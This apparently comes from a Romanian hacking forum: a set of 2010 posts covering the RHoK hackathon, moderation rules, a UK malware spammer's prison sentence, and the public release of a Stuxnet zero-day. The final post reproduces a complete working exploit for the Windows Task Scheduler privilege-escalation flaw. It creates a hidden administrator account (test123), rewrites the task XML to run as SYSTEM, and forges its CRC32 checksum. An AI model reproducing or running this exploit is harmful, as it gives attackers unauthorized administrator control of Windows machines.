Google, Microsoft, NASA si Yahoo organizeaza competitia de hacking legal de Laurentiu Crisu | 3 decembrie 2010 Saptamana aceasta va avea loc cea de-a doua editie a competitiei Random Hacks of Kindness (RHoK), care se va desfasura in mai multe orase din intreaga lume si va aduce de aceeasi parte a baricadei atat hackerii cat si unii dintre cei mai buni ingineri software. Evenimentul, gazduit de Google, Microsoft, Yahoo, NASA si Banca Mondiala, se va desfasura pe 4-6 decembrie 2010 si isi propune sa foloseasca tehnologia pentru a face lumea un loc mai bun, prin construirea unei comunitati de inovatie. “Hackathon-ul”, dupa cum l-au numit reprezentantii, aduce laolalta cei mai talentati hackeri din toate colturile lumii, dezvoltatori de software si experti in computere, care isi dedica timpul pentru a rezolva probleme din lumea reala. La sfarsitul celor doua zile de concurs, o aplicatie va selecta echipa care merita titlul de “RHoKstars”. Hack-urile castigatore in cadrul primei editii a acestei competitii au fost folosite pentru a furniza asistenta de urgenta in timpul cutremurelor din Haiti si Chile. “Evenimentul le ofera hacker-ilor oportunitatea de a-si folosi abilitatile in scopuri nobile, sub indrumarea expertilor care inteleg provocarile vietii reale”, a declarat Todd Khozein, reprezentant al RHoK. Din pacate, niciun oras din Romania nu va gazdui acest concurs. Pentru cei care isi doresc insa sa participe, cea mai apropiata locatie de tara noastra ar fi Berlin, Germania. Sursa: Google, Microsoft, NASA si Yahoo organizeaza competitia de hacking legal | Hit.ro

E mult mai rapida versiunea simpla, ai doar o comparatie si o atribuire, nu o gramada de calcule. In plus apelezi 2 functii, si apelurile de functii sunt consumatoare si de resurse (stiva) si de procesor (revenire din functie...). Dar asta conteaza doar daca faci milioane de apeluri ale functie pentru maxim.

Ratati care isi dau credite pentru multe lucruri cu care nu au nici o legatura. Copiaza exploituri din diverse locuri. Foarte probabil skids. Exploits Database by Offensive Security

Fara Java sau Flash, fisierele se pot descarca de catre altcineva in timp ce se uploadeaza... http://ge.tt/

1) Cu ce te ajuta asta? 2) Sunt intrebari care nu primesc nici un raspuns, in veci, ai atata rabdare? De ce sa nu se raspunda la o intrebare? 3) Care e rostul, invatam sa numaram? Idei stupide.

Dupa cum observati, categoria Offtopic este foarte vizitata, deoarece acolo se posteaza tot felul de lucruri, mai mult sau mai putin utile. Problema apare cand se posteaza si lucruri care isi au locul in alta parte, de cele mai multe ori cererile de diverse lucruri si cererea ajutorului in diverse probleme. Aceste subiecte au categorii speciale in care sa se poata posta, "Cereri" si "Ajutor". Nu vad de ce sa se posteze totul la "Offtopic". Sectiunea este pentru posturile care nu se incadreaza in alte categorii. Desigur, cred ca sunt mai mari sansele sa primiti un raspuns la "Offtopic" decat la locul special, pentru ca e o categorie mai vizitata, dar se va ajunge la balamuc astfel. Dupa cum o parte dintre voi ati observat, daca veti posta intr-o categorie gresita (nu numai la "Offtopic") veti primi un avertisment. Asadar, inainte de a deschide un topic, cititi si numele categoriilor, si descrierile lor daca nu ati inteles ce anume se posteaza in acele categorii. Intr-adevar, daca doriti sa postati un tutorial despre programare, nu va voi sanctiona daca alegeti sa il postati la "Tutoriale Romana/Engleza" sau "Programare", din simplul motiv ca se incadreaza in ambele categorii si in plus este si ceva util care ajuta membrii forumului. Insa daca veti posta toate prostiile anapoda veti fi avertizati. Inca o data, putina atentie inainte de a posta.

Modul de vedere ("Birds eye") din satelit e excelent. Incercati, sunt sigur ca o sa va placa. http://www.bing.com/maps/ Sincer, nu se compara Yahoo! si Google cu asa ceva... 1 - 0 pentru Microsoft din partea mea.

Probabil trimiti si tu 20 de mailuri cu istealer sa furi niste parole de messenger... Nu te speria, pe tine nu o sa te bage nimeni in seama. Da, daca cineva iti fura portofelul vrei sa intre la puscarie, daca cineva iti fura banii din cont de ce sa nu intre la puscarie? De fapt voi ati merita sa infundati puscariile, macar cei ce fura portofele "muncesc" sa le aiba, voi luati 2 programe care nu stiti ce fac si gata, sunteti hackeri cu bani. La cateva sute de euro nu se uita nimeni, daca ai fi baiat destept si ai face mai mult acum as posta o stire despre tine, dar sunt sigur ca nu o sa fie cazul.

"""Hacker""" Gets 18 Months in U.K. Prison Mai bine spus "Looser". Bun, am mai scapat de un hot. La puscarie cu toti cei ca el, la munca nu la intins mana. A Scottish man was sentenced today to 18 months in prison for spamming out e-mails laced with malware and stealing data. A 33-year-old Scottish man was sentenced today to 18 months in prison in the U.K. for spamming out malware-infected e-mails and stealing data. The sentencing today of Matthew Anderson of Drummuir, Aberdeenshire, Scotland, brought to an end to an investigation first launched four years ago. According to the Metropolitan Police Service (MPS), Anderson was part of a ring that targeted hundreds of businesses in the U.K. with malware starting in 2005. The conspiracy was operated by members of a cyber-crew called m00p that spammed out millions of e-mails laced with malware, authorities said. It was Anderson's job to manage the operation by composing the e-mails and distributing them with virus attachments, police said. The malware allowed Anderson to access private data stored on computers without the knowledge of the computer's owner, according to police. "This organized online criminal network infected huge numbers of computers around the world, especially targeting U.K. businesses and individuals," said Detective Constable Bob Burls, from the MPS Central e-Crime Unit, in a statement. "Matthew Anderson methodically exploited computer users not only for his own financial gain but also violating their privacy. They used sophisticated computer code to commit their crimes." The investigation resulted in the arrests of three men—including Anderson—on June 27, 2006. No charges were filed against one of the men, while the other pleaded guilty in 2008, according to reports. According to police, a number of computers were seized at residential addresses in both countries in addition to the suspects' servers as part of the investigation. When online, Anderson used the profile names of "aobuluz" and "warpigs," authorities said, and operated his illegal business behind the front of an online company called Optom Security that offered security software. Among the evidence police found were screenshots on Anderson's computers taken from other people's Webcams as well as copies of wills, medial reports, password lists and other content, police said. "The Internet means criminals have increased opportunities to commit crime internationally; however, I'd like to reassure the public that the international law enforcement and antivirus companies' response is increasingly sophisticated," Burls said. "As this case shows, criminals can't hide online and are being held to account for their actions. A complex investigation like this demonstrates what international cooperation can achieve." Sursa: Hacker Gets 18 Months in U.K. Prison - Security - News & Reviews

Exploit code for one of the zero-day vulnerabilities exploited by Stuxnet Exploit code for one of the zero-day vulnerabilities exploited by the Stuxnet worm has made its way online. The code exploits a Windows Task Scheduler vulnerability, and can be used to escalate privileges. The exploit code was added to the Exploit Database operated by Offensive Security Nov. 20. There is no patch currently available for the flaw, though Microsoft said one is forthcoming. “Microsoft is aware of the public posting of the details of an Elevation of Privilege vulnerability used by the Stuxnet malware,” Jerry Bryant, group manager of Response Communications at Microsoft, said in a statement. “We first discussed this vulnerability in September 2010. Because this is a local Elevation-of-Privilege issue, it requires attackers to be already able to execute code on a targeted machine. A bulletin addressing this issue will be released as part of our regular monthly bulletin cycle in the near future.” The vulnerability was one of four zero-days used by the malware in its bid to compromise industrial control systems. The three others have all been patched since the worm was discovered this summer. Researchers have spent the last several months trying to get to the bottom of the Stuxnet worm. Just recently, Symantec reported evidence that it targets frequency converter drives used to control the speed of motors, and that the actual goal of the worm may be to disrupt nuclear programs. In particular, speculation has focused on Iran as a possible target, as it has been the site of many of Stuxnet's infections. Among the other zero-days Stuxnet has been observed using are the .LNK shortcut vulnerability, patched in August; a vulnerability in the Windows Print Spooler service (MS10-061), patched in September; and another privilege escalation issue (MS10-073), patched in a massive update in October. Early versions of the worm also spread without a vulnerability at all; instead abusing How Stuxnet Malware Used AutoRun Trick to Infect PCs - Security - News & Reviews to compromise machines through infected USB devices. Sursa: Exploit Code for Windows Zero-Day Targeted by Stuxnet Goes Public - Security - News & Reviews

Windows Task Scheduler Privilege Escalation 0day # Exploit Title: Windows Task Scheduler Privilege Escalation 0day # Date: 20-11-2010 # Author: webDEViL # Tested on: Windows 7/2008 x86/x64 <job id="tasksch-wD-0day"> <script language="Javascript"> crc_table = new Array( 0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419, 0x706AF48F, 0xE963A535, 0x9E6495A3, 0x0EDB8832, 0x79DCB8A4, 0xE0D5E91E, 0x97D2D988, 0x09B64C2B, 0x7EB17CBD, 0xE7B82D07, 0x90BF1D91, 0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE, 0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7, 0x136C9856, 0x646BA8C0, 0xFD62F97A, 0x8A65C9EC, 0x14015C4F, 0x63066CD9, 0xFA0F3D63, 0x8D080DF5, 0x3B6E20C8, 0x4C69105E, 0xD56041E4, 0xA2677172, 0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B, 0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940, 0x32D86CE3, 0x45DF5C75, 0xDCD60DCF, 0xABD13D59, 0x26D930AC, 0x51DE003A, 0xC8D75180, 0xBFD06116, 0x21B4F4B5, 0x56B3C423, 0xCFBA9599, 0xB8BDA50F, 0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924, 0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D, 0x76DC4190, 0x01DB7106, 0x98D220BC, 0xEFD5102A, 0x71B18589, 0x06B6B51F, 0x9FBFE4A5, 0xE8B8D433, 0x7807C9A2, 0x0F00F934, 0x9609A88E, 0xE10E9818, 0x7F6A0DBB, 0x086D3D2D, 0x91646C97, 0xE6635C01, 0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E, 0x6C0695ED, 0x1B01A57B, 0x8208F4C1, 0xF50FC457, 0x65B0D9C6, 0x12B7E950, 0x8BBEB8EA, 0xFCB9887C, 0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3, 0xFBD44C65, 0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2, 0x4ADFA541, 0x3DD895D7, 0xA4D1C46D, 0xD3D6F4FB, 0x4369E96A, 0x346ED9FC, 0xAD678846, 0xDA60B8D0, 0x44042D73, 0x33031DE5, 0xAA0A4C5F, 0xDD0D7CC9, 0x5005713C, 0x270241AA, 0xBE0B1010, 0xC90C2086, 0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F, 0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4, 0x59B33D17, 0x2EB40D81, 0xB7BD5C3B, 0xC0BA6CAD, 0xEDB88320, 0x9ABFB3B6, 0x03B6E20C, 0x74B1D29A, 0xEAD54739, 0x9DD277AF, 0x04DB2615, 0x73DC1683, 0xE3630B12, 0x94643B84, 0x0D6D6A3E, 0x7A6A5AA8, 0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1, 0xF00F9344, 0x8708A3D2, 0x1E01F268, 0x6906C2FE, 0xF762575D, 0x806567CB, 0x196C3671, 0x6E6B06E7, 0xFED41B76, 0x89D32BE0, 0x10DA7A5A, 0x67DD4ACC, 0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5, 0xD6D6A3E8, 0xA1D1937E, 0x38D8C2C4, 0x4FDFF252, 0xD1BB67F1, 0xA6BC5767, 0x3FB506DD, 0x48B2364B, 0xD80D2BDA, 0xAF0A1B4C, 0x36034AF6, 0x41047A60, 0xDF60EFC3, 0xA867DF55, 0x316E8EEF, 0x4669BE79, 0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236, 0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F, 0xC5BA3BBE, 0xB2BD0B28, 0x2BB45A92, 0x5CB36A04, 0xC2D7FFA7, 0xB5D0CF31, 0x2CD99E8B, 0x5BDEAE1D, 0x9B64C2B0, 0xEC63F226, 0x756AA39C, 0x026D930A, 0x9C0906A9, 0xEB0E363F, 0x72076785, 0x05005713, 0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38, 0x92D28E9B, 0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21, 0x86D3D2D4, 0xF1D4E242, 0x68DDB3F8, 0x1FDA836E, 0x81BE16CD, 0xF6B9265B, 0x6FB077E1, 0x18B74777, 0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C, 0x8F659EFF, 0xF862AE69, 0x616BFFD3, 0x166CCF45, 0xA00AE278, 0xD70DD2EE, 0x4E048354, 0x3903B3C2, 0xA7672661, 0xD06016F7, 0x4969474D, 0x3E6E77DB, 0xAED16A4A, 0xD9D65ADC, 0x40DF0B66, 0x37D83BF0, 0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9, 0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6, 0xBAD03605, 0xCDD70693, 0x54DE5729, 0x23D967BF, 0xB3667A2E, 0xC4614AB8, 0x5D681B02, 0x2A6F2B94, 0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B, 0x2D02EF8D ); var hD='0123456789ABCDEF'; function dec2hex(d) { h=''; for (i=0;i<8;i++) { h = hD.charAt(d&15)+h; d >>>= 4; } return h; } function encodeToHex(str){ var r=""; var e=str.length; var c=0; var h; while(c<e){ h=str.charCodeAt(c++).toString(16); while(h.length<3) h="0"+h; r+=h; } return r; } function decodeFromHex(str){ var r=""; var e=str.length; var s=0; while(e>1){ r=r+String.fromCharCode("0x"+str.substring(s,s+2)); s=s+2; e=e-2; } return r; } function calc_crc(anyForm) { anyTextString=decodeFromHex(anyForm); Crc_value = 0xFFFFFFFF; StringLength=anyTextString.length; for (i=0; i<StringLength; i++) { tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF; Table_value = crc_table[tableIndex]; Crc_value >>>= 8; Crc_value ^= Table_value; } Crc_value ^= 0xFFFFFFFF; return dec2hex(Crc_value); } function rev_crc(leadString,endString,crc32) { // // First, we calculate the CRC-32 for the initial string // anyTextString=decodeFromHex(leadString); Crc_value = 0xFFFFFFFF; StringLength=anyTextString.length; //document.write(alert(StringLength)); for (var i=0; i<StringLength; i++) { tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF; Table_value = crc_table[tableIndex]; Crc_value >>>= 8; Crc_value ^= Table_value; } // // Second, we calculate the CRC-32 without the final string // crc=parseInt(crc32,16); crc ^= 0xFFFFFFFF; anyTextString=decodeFromHex(endString); StringLength=anyTextString.length; for (var i=0; i<StringLength; i++) { tableIndex=0; Table_value = crc_table[tableIndex]; while (((Table_value ^ crc) >>> 24) & 0xFF) { tableIndex++; Table_value = crc_table[tableIndex]; } crc ^= Table_value; crc <<= 8; crc |= tableIndex ^ anyTextString.charCodeAt(StringLength - i -1); } // // Now let's find the 4-byte string // for (var i=0; i<4; i++) { tableIndex=0; Table_value = crc_table[tableIndex]; while (((Table_value ^ crc) >>> 24) & 0xFF) { tableIndex++; Table_value = crc_table[tableIndex]; } crc ^= Table_value; crc <<= 8; crc |= tableIndex; } crc ^= Crc_value; // // Finally, display the results // var TextString=dec2hex(crc); var Teststring=''; Teststring=TextString.substring(6,8); Teststring+=TextString.substring(4,6); Teststring+=TextString.substring(2,4); Teststring+=TextString.substring(0,2); return Teststring } function decodeFromHex(str){ var r=""; var e=str.length; var s=0; while(e>1){ r=r+String.fromCharCode("0x"+str.substring(s,s+2)); s=s+2; e=e-2; } return r; } </script> <script language="VBScript"> dim output set output = wscript.stdout output.writeline " Task Scheduler 0 day - Privilege Escalation " output.writeline " Should work on Vista/Win7/2008 x86/x64" output.writeline " webDEViL - w3bd3vil [at] gmail [dot] com" & vbCr & vbLf biatchFile = WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2)+"\xpl.bat" Set objShell = CreateObject("WScript.Shell") objShell.Run "schtasks /create /TN wDw00t /sc monthly /tr """+biatchFile+"""",,True Set fso = CreateObject("Scripting.FileSystemObject") Set a = fso.CreateTextFile(biatchFile, True) a.WriteLine ("net user /add test123 test123") a.WriteLine ("net localgroup administrators /add test123") a.WriteLine ("schtasks /delete /f /TN wDw00t") Function ReadByteArray(strFileName) Const adTypeBinary = 1 Dim bin Set bin = CreateObject("ADODB.Stream") bin.Type = adTypeBinary bin.Open bin.LoadFromFile strFileName ReadByteArray = bin.Read 'output.writeline ReadByteArray End Function Function OctetToHexStr (arrbytOctet) Dim k OctetToHexStr = "" For k = 3 To Lenb (arrbytOctet) OctetToHexStr = OctetToHexStr _ & Right("0" & Hex(Ascb(Midb(arrbytOctet, k, 1))), 2) Next End Function strFileName="C:\windows\system32\tasks\wDw00t" hexXML = OctetToHexStr (ReadByteArray(strFileName)) 'output.writeline hexXML crc32 = calc_crc(hexXML) output.writeline "Crc32 Original: "+crc32 Set xmlDoc = CreateObject("Microsoft.XMLDOM") 'permissions workaround 'objShell.Run "cmd /c copy C:\windows\system32\tasks\wDw00t .",,True 'objShell.Run "cmd /c schtasks /query /XML /TN wDw00t > wDw00t.xml",,True Set objShell = WScript.CreateObject("WScript.Shell") Set objExecObject = objShell.Exec("cmd /c schtasks /query /XML /TN wDw00t") Do Until objExecObject.StdOut.AtEndOfStream strLine = strLine & objExecObject.StdOut.ReadLine() Loop hexXML = "FFFE3C00"+OctetToHexStr(strLine) 'output.writeline hexXML Set ts = fso.createtextfile ("wDw00t.xml") For n = 1 To (Len (hexXML) - 1) step 2 ts.write Chr ("&h" & Mid (hexXML, n, 2)) Next ts.close xmlDoc.load "wDw00t.xml" Set Author = xmlDoc.selectsinglenode ("//Task/RegistrationInfo/Author") Author.text = "LocalSystem" Set UserId = xmlDoc.selectsinglenode ("//Task/Principals/Principal/UserId") UserId.text = "S-1-5-18" xmldoc.save(strFileName) hexXML = OctetToHexStr (ReadByteArray(strFileName)) leadString=hexXML+"3C0021002D002D00" endString="2D002D003E00" 'output.writeline leadString impbytes=rev_crc(leadString,endString,crc32) output.writeline "Crc32 Magic Bytes: "+impbytes finalString = leadString+impbytes+endString forge = calc_crc(finalString) output.writeline "Crc32 Forged: "+forge strHexString="FFFE"+finalString Set fso = CreateObject ("scripting.filesystemobject") Set stream = CreateObject ("adodb.stream") Set ts = fso.createtextfile (strFileName) For n = 1 To (Len (strHexString) - 1) step 2 ts.write Chr ("&h" & Mid (strHexString, n, 2)) Next ts.close Set objShell = CreateObject("WScript.Shell") objShell.Run "schtasks /change /TN wDw00t /disable",,True objShell.Run "schtasks /change /TN wDw00t /enable",,True objShell.Run "schtasks /run /TN wDw00t",,True </script> </job> E exploit-ul folosit de worm-ul Stuxnet. Sursa: Windows Task Scheduler Privilege Escalation 0day